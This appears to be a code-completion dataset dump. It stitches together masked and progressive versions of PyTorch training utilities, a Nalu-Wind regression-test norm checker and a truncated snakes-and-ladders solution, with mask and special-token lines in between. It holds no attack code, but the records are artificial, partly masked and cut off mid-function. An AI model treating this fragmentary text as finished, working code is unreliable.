{:.5f}'.format(epoch,\n losses['loss'][epoch], losses['val_loss'][epoch])\n for metric_name, value in scores.items():\n str_log += ' - {}: {:.5f}'.format(metric_name, value)\n self._print.append(str_log)\n\n def show(self):\n clear_output()\n print('_' * 100, '\\nFold ', self.fold)\n for p in self._print:\n print('_' * 100)\n print('| ' + p)\n\n def update_and_show(self, epoch, losses, score, time=None):\n self.update(epoch, losses, score, time)\n self.show()\n\n\nclass WorkplaceManager:\n\n def __init__(self, seed, dirs, exts, n_fols=10):\n self.seed = seed\n self.dirs = dirs\n self.exts = exts\n self.n_folds = n_fols\n self._set_workplace()\n\n @staticmethod\n def create_dir(dir):\n os.makedirs(dir, exist_ok=True)\n\n def _create_dirs(self):\n print('Created {}'.format(' '.join(self.dirs)))\n for d in self.dirs:\n self.create_dir(d)\n\n def _clear_dirs(self):\n print('Deleted {}'.format(' '.join(self.dirs)))\n self.clear([f'{d}*' for d in self.dirs])\n\n def _clear_files(self):\n print('Deleted {}'.format(' '.join(self.exts)))\n self.clear([f'*{ext}' for ext in self.exts])\n\n def clear(self, objs_name):\n os.system('rm -r {}'.format(' '.join(objs_name)))\n\n def _set_workplace(self):\n seed_everything(self.seed)\n if os.path.exists('models') and len(os.listdir('models/')\n ) == self.n_folds:\n self._clear_dirs()\n self._clear_files()\n self._create_dirs()\n\n\nclass CrossValLogger:\n\n def __init__(self, df, metric_name, n_folds=10, oof_cv='cv_score.pkl',\n path='evals/roberta-base/'):\n assert df.fold.nunique(\n ) == n_folds, 'Unconsistency between df.n_folds and n_folds'\n self.df = df.copy()\n self.metric_name = metric_name\n self.path = path\n self.n_folds = n_folds\n self.oof_cv = oof_cv\n self.score1, self.score2 = None, None\n\n def _retrieve_eval_preds(self):\n ph = self.path + 'fold_{}_best_eval.npy'\n shape = self.df.shape[0], self.df.label.nunique()\n preds = np.empty(shape, dtype=np.float32)\n for i in self.df.fold.unique():\n index = self.df[self.df.fold == i].index.values\n fold_pred = np.load(ph.format(i))\n preds[index] = fold_pred[:, :]\n return preds\n\n def _load_oof_cv_score(self):\n score = 0\n with open(self.oof_cv, 'rb') as f:\n score = pickle.load(f)\n f.close()\n return score\n\n def show_results(self, return_score=False):\n if self.score1 is None:\n eval_preds = self._retrieve_eval_preds()\n self.score1 = self._load_oof_cv_score() / self.n_folds\n self.score2 = evaluation(self.df.label.values, eval_preds,\n labels=self.df.label.unique())[self.metric_name]\n print('OOF_CV_SCORE: {:.5f} | OVR_SCORE: {:.5f}'.format(self.score1,\n self.score2))\n if return_score:\n return self.score1, self.score2\n",
"step-4": "<mask token>\n\n\ndef seed_everything(seed):\n print(f'Set seed to {seed}.')\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n\ndef is_blackbone(n):\n return n.startswith('model')\n\n\ndef evaluation(ytrue, y_pred, labels=[0, 1, 2, 3]):\n log = log_loss(ytrue, y_pred, labels=labels)\n f1 = f1_score(ytrue, y_pred.argmax(1), average='weighted')\n acc = accuracy_score(ytrue, y_pred.argmax(1))\n return {'Logloss': log, 'F1': f1, 'Acc': acc}\n\n\ndef getTokenizer(model_config, tok_name):\n return AutoTokenizer.from_pretrained(tok_name, config=model_config,\n add_prefix_space=False)\n\n\nclass EarlyStopping:\n\n def __init__(self, patience=5, mode='max'):\n self.step = 0\n self.stop = False\n self.score = 0\n self.patience = patience\n self.mode = mode\n self.mult = 1 if mode == 'max' else -1\n\n def update(self, score):\n if self.mult * (self.score - score) > 0:\n self.step += 1\n else:\n self.step = 0\n self.score = score\n if self.step == self.patience:\n self.stop = True\n\n\nclass Timer:\n\n def __init__(self):\n self._time = 0\n self.is_stopped = False\n self._start()\n\n def _start(self):\n self._time = time()\n\n def _stop(self):\n if not self.is_stopped:\n self.is_stopped = True\n self._time = time() - self._time\n\n @property\n def time(self):\n self._stop()\n return self._time\n\n def to_string(self):\n return '{:02d}:{:02d}'.format(*self.m_s())\n\n def m_s(self):\n t = round(self.time)\n s = t % 60\n m = t // 60\n return m, s\n\n\nclass Printer:\n\n def __init__(self, fold=0):\n self._print = []\n self.fold = fold\n\n def pprint(self, **kwargs):\n str_log = '\\r'\n for key in kwargs.keys():\n str_log += '{}: {} - '.format(key, kwargs[key])\n print(str_log, end='')\n\n def update(self, epoch, losses, scores, time=None):\n str_log = f'⏰ {time} | ' if time else ''\n str_log += 'Epoch: {} - Loss: {:.5f} - ValLoss: {:.5f}'.format(epoch,\n losses['loss'][epoch], losses['val_loss'][epoch])\n for metric_name, value in scores.items():\n str_log += ' - {}: {:.5f}'.format(metric_name, value)\n self._print.append(str_log)\n\n def show(self):\n clear_output()\n print('_' * 100, '\\nFold ', self.fold)\n for p in self._print:\n print('_' * 100)\n print('| ' + p)\n\n def update_and_show(self, epoch, losses, score, time=None):\n self.update(epoch, losses, score, time)\n self.show()\n\n\nclass WorkplaceManager:\n\n def __init__(self, seed, dirs, exts, n_fols=10):\n self.seed = seed\n self.dirs = dirs\n self.exts = exts\n self.n_folds = n_fols\n self._set_workplace()\n\n @staticmethod\n def create_dir(dir):\n os.makedirs(dir, exist_ok=True)\n\n def _create_dirs(self):\n print('Created {}'.format(' '.join(self.dirs)))\n for d in self.dirs:\n self.create_dir(d)\n\n def _clear_dirs(self):\n print('Deleted {}'.format(' '.join(self.dirs)))\n self.clear([f'{d}*' for d in self.dirs])\n\n def _clear_files(self):\n print('Deleted {}'.format(' '.join(self.exts)))\n self.clear([f'*{ext}' for ext in self.exts])\n\n def clear(self, objs_name):\n os.system('rm -r {}'.format(' '.join(objs_name)))\n\n def _set_workplace(self):\n seed_everything(self.seed)\n if os.path.exists('models') and len(os.listdir('models/')\n ) == self.n_folds:\n self._clear_dirs()\n self._clear_files()\n self._create_dirs()\n\n\nclass CrossValLogger:\n\n def __init__(self, df, metric_name, n_folds=10, oof_cv='cv_score.pkl',\n path='evals/roberta-base/'):\n assert df.fold.nunique(\n ) == n_folds, 'Unconsistency between df.n_folds and n_folds'\n self.df = df.copy()\n self.metric_name = metric_name\n self.path = path\n self.n_folds = n_folds\n self.oof_cv = oof_cv\n self.score1, self.score2 = None, None\n\n def _retrieve_eval_preds(self):\n ph = self.path + 'fold_{}_best_eval.npy'\n shape = self.df.shape[0], self.df.label.nunique()\n preds = np.empty(shape, dtype=np.float32)\n for i in self.df.fold.unique():\n index = self.df[self.df.fold == i].index.values\n fold_pred = np.load(ph.format(i))\n preds[index] = fold_pred[:, :]\n return preds\n\n def _load_oof_cv_score(self):\n score = 0\n with open(self.oof_cv, 'rb') as f:\n score = pickle.load(f)\n f.close()\n return score\n\n def show_results(self, return_score=False):\n if self.score1 is None:\n eval_preds = self._retrieve_eval_preds()\n self.score1 = self._load_oof_cv_score() / self.n_folds\n self.score2 = evaluation(self.df.label.values, eval_preds,\n labels=self.df.label.unique())[self.metric_name]\n print('OOF_CV_SCORE: {:.5f} | OVR_SCORE: {:.5f}'.format(self.score1,\n self.score2))\n if return_score:\n return self.score1, self.score2\n",
"step-5": "import os, gc, random\nfrom time import time\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import log_loss, f1_score, accuracy_score\nfrom collections import Counter\nfrom IPython.display import clear_output\nimport torch\nfrom transformers import (\n AutoTokenizer, RobertaTokenizerFast, \n BertTokenizerFast, ElectraTokenizerFast\n)\n\ndef seed_everything(seed):\n print(f'Set seed to {seed}.')\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available(): \n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\ndef is_blackbone(n):\n return n.startswith('model')\n \ndef evaluation(ytrue, y_pred, labels=[0,1,2,3]):\n log = log_loss(ytrue, y_pred, labels=labels)\n f1 = f1_score(ytrue, y_pred.argmax(1), average='weighted')\n acc = accuracy_score(ytrue, y_pred.argmax(1))\n\n return {'Logloss': log, 'F1': f1, 'Acc': acc}\n\ndef getTokenizer(model_config, tok_name):\n return AutoTokenizer.from_pretrained(tok_name, config=model_config, add_prefix_space=False)\n\nclass EarlyStopping:\n def __init__(self, patience=5, mode='max'):\n self.step = 0\n self.stop = False\n self.score = 0\n self.patience = patience\n self.mode = mode\n self.mult = 1 if mode=='max' else -1\n\n def update(self, score):\n if self.mult*(self.score-score) > 0:\n self.step += 1\n else: \n self.step = 0\n self.score = score\n \n if self.step == self.patience: \n self.stop = True\n\nclass Timer:\n def __init__(self):\n self._time = 0\n self.is_stopped = False\n self._start()\n\n def _start(self):\n self._time = time()\n\n def _stop(self):\n if not self.is_stopped:\n self.is_stopped = True\n self._time = time()-self._time\n\n @property\n def time(self):\n self._stop()\n return self._time\n\n def to_string(self):\n return \"{:02d}:{:02d}\".format(*self.m_s())\n\n def m_s(self):\n t = round(self.time)\n s = t%60\n m = t//60\n\n return m,s\n\n\nclass Printer:\n def __init__(self, fold=0):\n self._print = []\n self.fold = fold\n\n def pprint(self, **kwargs):\n str_log = \"\\r\"\n for key in kwargs.keys():\n str_log += \"{}: {} - \".format(key, kwargs[key])\n \n print(str_log, end='')\n\n def update(self, epoch, losses, scores, time = None):\n str_log = f\"⏰ {time} | \" if time else \"\"\n str_log += \"Epoch: {} - Loss: {:.5f} - ValLoss: {:.5f}\".format(epoch, losses['loss'][epoch], losses['val_loss'][epoch])\n for metric_name, value in scores.items():\n str_log += ' - {}: {:.5f}'.format(metric_name, value)\n\n self._print.append(str_log)\n\n def show(self):\n clear_output()\n\n print(\"_\"*100, \"\\nFold \", self.fold)\n for p in self._print:\n print(\"_\" * 100)\n print('| '+ p)\n\n def update_and_show(self, epoch, losses, score, time=None):\n self.update(epoch, losses, score, time)\n self.show()\n\n\nclass WorkplaceManager:\n def __init__(self, seed, dirs, exts, n_fols=10):\n self.seed = seed\n self.dirs = dirs\n self.exts = exts\n self.n_folds = n_fols\n\n self._set_workplace()\n\n @staticmethod\n def create_dir(dir):\n os.makedirs(dir, exist_ok=True)\n \n def _create_dirs(self):\n print('Created {}'.format(' '.join(self.dirs)))\n for d in self.dirs:\n self.create_dir(d)\n \n def _clear_dirs(self):\n print('Deleted {}'.format(' '.join(self.dirs)))\n self.clear([f'{d}*' for d in self.dirs])\n\n def _clear_files(self):\n print('Deleted {}'.format(' '.join(self.exts)))\n self.clear([f'*{ext}' for ext in self.exts])\n\n def clear(self, objs_name):\n os.system('rm -r {}'.format(' '.join(objs_name)))\n\n def _set_workplace(self):\n seed_everything(self.seed)\n if os.path.exists('models') and len(os.listdir('models/')) == self.n_folds:\n self._clear_dirs()\n self._clear_files() \n self._create_dirs()\n\n\nclass CrossValLogger:\n def __init__(self, df, metric_name, n_folds=10, oof_cv = 'cv_score.pkl', path='evals/roberta-base/'):\n assert df.fold.nunique()==n_folds, \"Unconsistency between df.n_folds and n_folds\"\n\n self.df = df.copy()\n self.metric_name = metric_name\n self.path = path\n self.n_folds = n_folds\n self.oof_cv = oof_cv\n self.score1, self.score2 = None, None\n\n def _retrieve_eval_preds(self):\n ph = self.path+'fold_{}_best_eval.npy'\n shape = ( self.df.shape[0], self.df.label.nunique() )\n preds = np.empty(shape, dtype=np.float32)\n for i in self.df.fold.unique():\n index = self.df[self.df.fold==i].index.values\n fold_pred = np.load(ph.format(i))\n preds[index] = fold_pred[:, :]\n return preds\n\n def _load_oof_cv_score(self):\n score = 0\n with open(self.oof_cv, 'rb') as f:\n score = pickle.load(f)\n f.close()\n return score\n\n def show_results(self, return_score=False):\n if self.score1 is None:\n eval_preds = self._retrieve_eval_preds()\n self.score1 = self._load_oof_cv_score() / self.n_folds #oof_cv_scores\n self.score2 = evaluation(self.df.label.values, eval_preds, labels=self.df.label.unique())[self.metric_name] #ovr_score\n\n print('OOF_CV_SCORE: {:.5f} | OVR_SCORE: {:.5f}'.format(self.score1, self.score2))\n \n if return_score: return self.score1, self.score2\n",
"step-ids": [
23,
29,
31,
33,
35
]
}
|
[
23,
29,
31,
33,
35
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Check mean system norm errors in regression tests
This script determines the pass/fail status of a regression test by comparing
the "Mean System Norm" values output at each timestep against "gold values"
from the reference file provided by the user.
Success is determined by the following criteria: the number of timesteps in the
log file matches the number of timesteps in the gold file, and for each
timestep the system norms meet the absolute and relative tolerances (default
1.0e-16 and 1.0e-7 respectively). The tolerances can be adjusted using command
line arguments, pass `-h` to get a brief usage message.
"""
import sys
import os
import math
import subprocess
import argparse
from shutil import copyfile
def parse_arguments():
"""Parse command line arguments"""
parser = argparse.ArgumentParser(
description="Nalu-Wind regression test check utility")
parser.add_argument(
'--abs-tol', type=float, default=1.0e-15,
help="Tolerance for absolute error")
parser.add_argument(
'--rel-tol', type=float, default=1.0e-7,
help="Tolerance for relative error")
parser.add_argument(
"test_name", help="Regression test name")
parser.add_argument(
"gold_norms", help="Absolute path to the gold norms file")
parser.add_argument(
'--save-norm-file', required=False,
help="File in which to save a copy of the norms")
return parser.parse_args()
def load_norm_file(fname):
"""Parse the norm file and return the mean system norms"""
try:
with open(fname, 'r') as fh:
lines = fh.readlines()
norms = [float(ll.strip().split()[0]) for ll in lines]
return norms
except:
return []
def generate_test_norms(testname):
"""Parse the log file and generate test norms"""
logname = testname + ".log"
norm_name = testname + ".norm"
cmdline = """awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s """%(
logname, norm_name)
os.system(cmdline)
args = parse_arguments()
if (args.save_norm_file != None):
copyfile(norm_name, args.save_norm_file)
return load_norm_file(norm_name)
def get_run_time(testname):
"""Return STKPERF total time"""
logname = testname + ".log"
cmdline = """awk '/STKPERF: Total Time/ { print $4; }' %s """%(
logname)
try:
pp = subprocess.run(cmdline, shell=True, check=True, capture_output=True)
return pp.stdout.decode('UTF-8').strip()
except:
return ""
def check_norms(test_norms, gold_norms, atol, rtol):
"""Check the regression test norms"""
if len(test_norms) != len(gold_norms):
print("Number of timesteps do not match", flush=True)
return (False, 1.0e16, 1.0e16)
test_pass = True
abs_diff = 0.0
rel_diff = 0.0
for t1, t2 in zip(test_norms, gold_norms):
adiff = abs(t1 - t2)
rdiff = abs(t1 / t2 - 1.0)
abs_diff = max(abs_diff, adiff)
rel_diff = max(rel_diff, rdiff)
if (adiff > atol) and (rdiff > rtol):
test_pass = False
return (test_pass, abs_diff, rel_diff)
def main():
"""Driver function"""
args = parse_arguments()
test_norms = generate_test_norms(args.test_name)
gold_norms = load_norm_file(args.gold_norms)
run_time = get_run_time(args.test_name)
run_time = float(run_time) if run_time else 0.0
status, adiff, rdiff = check_norms(
test_norms, gold_norms, args.abs_tol, args.rel_tol)
name = args.test_name.ljust(40, ".")
status_str = "PASS:" if status else "FAIL:"
print("%s %-40s %10.4fs %.4e %.4e"%(
status_str, name, run_time, adiff, rdiff), flush=True)
sys.exit(0 if status else 1)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "d03669924233edf33fcb6645f5ed7ab118f54a95",
"index": 7610,
"step-1": "<mask token>\n\n\ndef load_norm_file(fname):\n \"\"\"Parse the norm file and return the mean system norms\"\"\"\n try:\n with open(fname, 'r') as fh:\n lines = fh.readlines()\n norms = [float(ll.strip().split()[0]) for ll in lines]\n return norms\n except:\n return []\n\n\ndef generate_test_norms(testname):\n \"\"\"Parse the log file and generate test norms\"\"\"\n logname = testname + '.log'\n norm_name = testname + '.norm'\n cmdline = \"awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s \" % (\n logname, norm_name)\n os.system(cmdline)\n args = parse_arguments()\n if args.save_norm_file != None:\n copyfile(norm_name, args.save_norm_file)\n return load_norm_file(norm_name)\n\n\ndef get_run_time(testname):\n \"\"\"Return STKPERF total time\"\"\"\n logname = testname + '.log'\n cmdline = \"awk '/STKPERF: Total Time/ { print $4; }' %s \" % logname\n try:\n pp = subprocess.run(cmdline, shell=True, check=True, capture_output\n =True)\n return pp.stdout.decode('UTF-8').strip()\n except:\n return ''\n\n\ndef check_norms(test_norms, gold_norms, atol, rtol):\n \"\"\"Check the regression test norms\"\"\"\n if len(test_norms) != len(gold_norms):\n print('Number of timesteps do not match', flush=True)\n return False, 1e+16, 1e+16\n test_pass = True\n abs_diff = 0.0\n rel_diff = 0.0\n for t1, t2 in zip(test_norms, gold_norms):\n adiff = abs(t1 - t2)\n rdiff = abs(t1 / t2 - 1.0)\n abs_diff = max(abs_diff, adiff)\n rel_diff = max(rel_diff, rdiff)\n if adiff > atol and rdiff > rtol:\n test_pass = False\n return test_pass, abs_diff, rel_diff\n\n\ndef main():\n \"\"\"Driver function\"\"\"\n args = parse_arguments()\n test_norms = generate_test_norms(args.test_name)\n gold_norms = load_norm_file(args.gold_norms)\n run_time = get_run_time(args.test_name)\n run_time = float(run_time) if run_time else 0.0\n status, adiff, rdiff = check_norms(test_norms, gold_norms, args.abs_tol,\n args.rel_tol)\n name = args.test_name.ljust(40, '.')\n status_str = 'PASS:' if status else 'FAIL:'\n print('%s %-40s %10.4fs %.4e %.4e' % (status_str, name, run_time, adiff,\n rdiff), flush=True)\n sys.exit(0 if status else 1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_arguments():\n \"\"\"Parse command line arguments\"\"\"\n parser = argparse.ArgumentParser(description=\n 'Nalu-Wind regression test check utility')\n parser.add_argument('--abs-tol', type=float, default=1e-15, help=\n 'Tolerance for absolute error')\n parser.add_argument('--rel-tol', type=float, default=1e-07, help=\n 'Tolerance for relative error')\n parser.add_argument('test_name', help='Regression test name')\n parser.add_argument('gold_norms', help=\n 'Absolute path to the gold norms file')\n parser.add_argument('--save-norm-file', required=False, help=\n 'File in which to save a copy of the norms')\n return parser.parse_args()\n\n\ndef load_norm_file(fname):\n \"\"\"Parse the norm file and return the mean system norms\"\"\"\n try:\n with open(fname, 'r') as fh:\n lines = fh.readlines()\n norms = [float(ll.strip().split()[0]) for ll in lines]\n return norms\n except:\n return []\n\n\ndef generate_test_norms(testname):\n \"\"\"Parse the log file and generate test norms\"\"\"\n logname = testname + '.log'\n norm_name = testname + '.norm'\n cmdline = \"awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s \" % (\n logname, norm_name)\n os.system(cmdline)\n args = parse_arguments()\n if args.save_norm_file != None:\n copyfile(norm_name, args.save_norm_file)\n return load_norm_file(norm_name)\n\n\ndef get_run_time(testname):\n \"\"\"Return STKPERF total time\"\"\"\n logname = testname + '.log'\n cmdline = \"awk '/STKPERF: Total Time/ { print $4; }' %s \" % logname\n try:\n pp = subprocess.run(cmdline, shell=True, check=True, capture_output\n =True)\n return pp.stdout.decode('UTF-8').strip()\n except:\n return ''\n\n\ndef check_norms(test_norms, gold_norms, atol, rtol):\n \"\"\"Check the regression test norms\"\"\"\n if len(test_norms) != len(gold_norms):\n print('Number of timesteps do not match', flush=True)\n return False, 1e+16, 1e+16\n test_pass = True\n abs_diff = 0.0\n rel_diff = 0.0\n for t1, t2 in zip(test_norms, gold_norms):\n adiff = abs(t1 - t2)\n rdiff = abs(t1 / t2 - 1.0)\n abs_diff = max(abs_diff, adiff)\n rel_diff = max(rel_diff, rdiff)\n if adiff > atol and rdiff > rtol:\n test_pass = False\n return test_pass, abs_diff, rel_diff\n\n\ndef main():\n \"\"\"Driver function\"\"\"\n args = parse_arguments()\n test_norms = generate_test_norms(args.test_name)\n gold_norms = load_norm_file(args.gold_norms)\n run_time = get_run_time(args.test_name)\n run_time = float(run_time) if run_time else 0.0\n status, adiff, rdiff = check_norms(test_norms, gold_norms, args.abs_tol,\n args.rel_tol)\n name = args.test_name.ljust(40, '.')\n status_str = 'PASS:' if status else 'FAIL:'\n print('%s %-40s %10.4fs %.4e %.4e' % (status_str, name, run_time, adiff,\n rdiff), flush=True)\n sys.exit(0 if status else 1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef parse_arguments():\n \"\"\"Parse command line arguments\"\"\"\n parser = argparse.ArgumentParser(description=\n 'Nalu-Wind regression test check utility')\n parser.add_argument('--abs-tol', type=float, default=1e-15, help=\n 'Tolerance for absolute error')\n parser.add_argument('--rel-tol', type=float, default=1e-07, help=\n 'Tolerance for relative error')\n parser.add_argument('test_name', help='Regression test name')\n parser.add_argument('gold_norms', help=\n 'Absolute path to the gold norms file')\n parser.add_argument('--save-norm-file', required=False, help=\n 'File in which to save a copy of the norms')\n return parser.parse_args()\n\n\ndef load_norm_file(fname):\n \"\"\"Parse the norm file and return the mean system norms\"\"\"\n try:\n with open(fname, 'r') as fh:\n lines = fh.readlines()\n norms = [float(ll.strip().split()[0]) for ll in lines]\n return norms\n except:\n return []\n\n\ndef generate_test_norms(testname):\n \"\"\"Parse the log file and generate test norms\"\"\"\n logname = testname + '.log'\n norm_name = testname + '.norm'\n cmdline = \"awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s \" % (\n logname, norm_name)\n os.system(cmdline)\n args = parse_arguments()\n if args.save_norm_file != None:\n copyfile(norm_name, args.save_norm_file)\n return load_norm_file(norm_name)\n\n\ndef get_run_time(testname):\n \"\"\"Return STKPERF total time\"\"\"\n logname = testname + '.log'\n cmdline = \"awk '/STKPERF: Total Time/ { print $4; }' %s \" % logname\n try:\n pp = subprocess.run(cmdline, shell=True, check=True, capture_output\n =True)\n return pp.stdout.decode('UTF-8').strip()\n except:\n return ''\n\n\ndef check_norms(test_norms, gold_norms, atol, rtol):\n \"\"\"Check the regression test norms\"\"\"\n if len(test_norms) != len(gold_norms):\n print('Number of timesteps do not match', flush=True)\n return False, 1e+16, 1e+16\n test_pass = True\n abs_diff = 0.0\n rel_diff = 0.0\n for t1, t2 in zip(test_norms, gold_norms):\n adiff = abs(t1 - t2)\n rdiff = abs(t1 / t2 - 1.0)\n abs_diff = max(abs_diff, adiff)\n rel_diff = max(rel_diff, rdiff)\n if adiff > atol and rdiff > rtol:\n test_pass = False\n return test_pass, abs_diff, rel_diff\n\n\ndef main():\n \"\"\"Driver function\"\"\"\n args = parse_arguments()\n test_norms = generate_test_norms(args.test_name)\n gold_norms = load_norm_file(args.gold_norms)\n run_time = get_run_time(args.test_name)\n run_time = float(run_time) if run_time else 0.0\n status, adiff, rdiff = check_norms(test_norms, gold_norms, args.abs_tol,\n args.rel_tol)\n name = args.test_name.ljust(40, '.')\n status_str = 'PASS:' if status else 'FAIL:'\n print('%s %-40s %10.4fs %.4e %.4e' % (status_str, name, run_time, adiff,\n rdiff), flush=True)\n sys.exit(0 if status else 1)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport sys\nimport os\nimport math\nimport subprocess\nimport argparse\nfrom shutil import copyfile\n\n\ndef parse_arguments():\n \"\"\"Parse command line arguments\"\"\"\n parser = argparse.ArgumentParser(description=\n 'Nalu-Wind regression test check utility')\n parser.add_argument('--abs-tol', type=float, default=1e-15, help=\n 'Tolerance for absolute error')\n parser.add_argument('--rel-tol', type=float, default=1e-07, help=\n 'Tolerance for relative error')\n parser.add_argument('test_name', help='Regression test name')\n parser.add_argument('gold_norms', help=\n 'Absolute path to the gold norms file')\n parser.add_argument('--save-norm-file', required=False, help=\n 'File in which to save a copy of the norms')\n return parser.parse_args()\n\n\ndef load_norm_file(fname):\n \"\"\"Parse the norm file and return the mean system norms\"\"\"\n try:\n with open(fname, 'r') as fh:\n lines = fh.readlines()\n norms = [float(ll.strip().split()[0]) for ll in lines]\n return norms\n except:\n return []\n\n\ndef generate_test_norms(testname):\n \"\"\"Parse the log file and generate test norms\"\"\"\n logname = testname + '.log'\n norm_name = testname + '.norm'\n cmdline = \"awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s \" % (\n logname, norm_name)\n os.system(cmdline)\n args = parse_arguments()\n if args.save_norm_file != None:\n copyfile(norm_name, args.save_norm_file)\n return load_norm_file(norm_name)\n\n\ndef get_run_time(testname):\n \"\"\"Return STKPERF total time\"\"\"\n logname = testname + '.log'\n cmdline = \"awk '/STKPERF: Total Time/ { print $4; }' %s \" % logname\n try:\n pp = subprocess.run(cmdline, shell=True, check=True, capture_output\n =True)\n return pp.stdout.decode('UTF-8').strip()\n except:\n return ''\n\n\ndef check_norms(test_norms, gold_norms, atol, rtol):\n \"\"\"Check the regression test norms\"\"\"\n if len(test_norms) != len(gold_norms):\n print('Number of timesteps do not match', flush=True)\n return False, 1e+16, 1e+16\n test_pass = True\n abs_diff = 0.0\n rel_diff = 0.0\n for t1, t2 in zip(test_norms, gold_norms):\n adiff = abs(t1 - t2)\n rdiff = abs(t1 / t2 - 1.0)\n abs_diff = max(abs_diff, adiff)\n rel_diff = max(rel_diff, rdiff)\n if adiff > atol and rdiff > rtol:\n test_pass = False\n return test_pass, abs_diff, rel_diff\n\n\ndef main():\n \"\"\"Driver function\"\"\"\n args = parse_arguments()\n test_norms = generate_test_norms(args.test_name)\n gold_norms = load_norm_file(args.gold_norms)\n run_time = get_run_time(args.test_name)\n run_time = float(run_time) if run_time else 0.0\n status, adiff, rdiff = check_norms(test_norms, gold_norms, args.abs_tol,\n args.rel_tol)\n name = args.test_name.ljust(40, '.')\n status_str = 'PASS:' if status else 'FAIL:'\n print('%s %-40s %10.4fs %.4e %.4e' % (status_str, name, run_time, adiff,\n rdiff), flush=True)\n sys.exit(0 if status else 1)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCheck mean system norm errors in regression tests\n\nThis script determines the pass/fail status of a regression test by comparing\nthe \"Mean System Norm\" values output at each timestep against \"gold values\"\nfrom the reference file provided by the user.\n\nSuccess is determined by the following criteria: the number of timesteps in the\nlog file matches the number of timesteps in the gold file, and for each\ntimestep the system norms meet the absolute and relative tolerances (default\n1.0e-16 and 1.0e-7 respectively). The tolerances can be adjusted using command\nline arguments, pass `-h` to get a brief usage message.\n\"\"\"\n\nimport sys\nimport os\nimport math\nimport subprocess\nimport argparse\nfrom shutil import copyfile\n\ndef parse_arguments():\n \"\"\"Parse command line arguments\"\"\"\n parser = argparse.ArgumentParser(\n description=\"Nalu-Wind regression test check utility\")\n parser.add_argument(\n '--abs-tol', type=float, default=1.0e-15,\n help=\"Tolerance for absolute error\")\n parser.add_argument(\n '--rel-tol', type=float, default=1.0e-7,\n help=\"Tolerance for relative error\")\n parser.add_argument(\n \"test_name\", help=\"Regression test name\")\n parser.add_argument(\n \"gold_norms\", help=\"Absolute path to the gold norms file\")\n parser.add_argument(\n '--save-norm-file', required=False,\n help=\"File in which to save a copy of the norms\")\n return parser.parse_args()\n\ndef load_norm_file(fname):\n \"\"\"Parse the norm file and return the mean system norms\"\"\"\n try:\n with open(fname, 'r') as fh:\n lines = fh.readlines()\n norms = [float(ll.strip().split()[0]) for ll in lines]\n return norms\n except:\n return []\n\ndef generate_test_norms(testname):\n \"\"\"Parse the log file and generate test norms\"\"\"\n logname = testname + \".log\"\n norm_name = testname + \".norm\"\n cmdline = \"\"\"awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s \"\"\"%(\n logname, norm_name)\n os.system(cmdline)\n args = parse_arguments()\n if (args.save_norm_file != None):\n copyfile(norm_name, args.save_norm_file)\n\n return load_norm_file(norm_name)\n\ndef get_run_time(testname):\n \"\"\"Return STKPERF total time\"\"\"\n logname = testname + \".log\"\n cmdline = \"\"\"awk '/STKPERF: Total Time/ { print $4; }' %s \"\"\"%(\n logname)\n try:\n pp = subprocess.run(cmdline, shell=True, check=True, capture_output=True)\n return pp.stdout.decode('UTF-8').strip()\n except:\n return \"\"\n\ndef check_norms(test_norms, gold_norms, atol, rtol):\n \"\"\"Check the regression test norms\"\"\"\n if len(test_norms) != len(gold_norms):\n print(\"Number of timesteps do not match\", flush=True)\n return (False, 1.0e16, 1.0e16)\n\n test_pass = True\n abs_diff = 0.0\n rel_diff = 0.0\n\n for t1, t2 in zip(test_norms, gold_norms):\n adiff = abs(t1 - t2)\n rdiff = abs(t1 / t2 - 1.0)\n\n abs_diff = max(abs_diff, adiff)\n rel_diff = max(rel_diff, rdiff)\n\n if (adiff > atol) and (rdiff > rtol):\n test_pass = False\n\n return (test_pass, abs_diff, rel_diff)\n\ndef main():\n \"\"\"Driver function\"\"\"\n args = parse_arguments()\n test_norms = generate_test_norms(args.test_name)\n gold_norms = load_norm_file(args.gold_norms)\n run_time = get_run_time(args.test_name)\n run_time = float(run_time) if run_time else 0.0\n status, adiff, rdiff = check_norms(\n test_norms, gold_norms, args.abs_tol, args.rel_tol)\n\n name = args.test_name.ljust(40, \".\")\n status_str = \"PASS:\" if status else \"FAIL:\"\n print(\"%s %-40s %10.4fs %.4e %.4e\"%(\n status_str, name, run_time, adiff, rdiff), flush=True)\n sys.exit(0 if status else 1)\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def snakesAndLadders(self, board: List[List[int]]) ->int:
N = len(board)
def get_pos(num):
r = (num - 1) // N
c = (num - 1) % N
c = c if r + 1 & 1 else N - 1 - c
r = N - 1 - r
return r, c
def skip(num):
r, c = get_pos(num)
if board[r][c] != -1:
return board[r][c]
else:
return num
from collections import deque
dq = deque([1])
vis = set([1])
step = -1
while dq:
sz = len(dq)
step += 1
for _ in range(sz):
node = dq.popleft()
if node == N * N:
return step
for i in range(1, 7):
new_node = node + i
if new_node > N * N:
continue
new_node = skip(new_node)
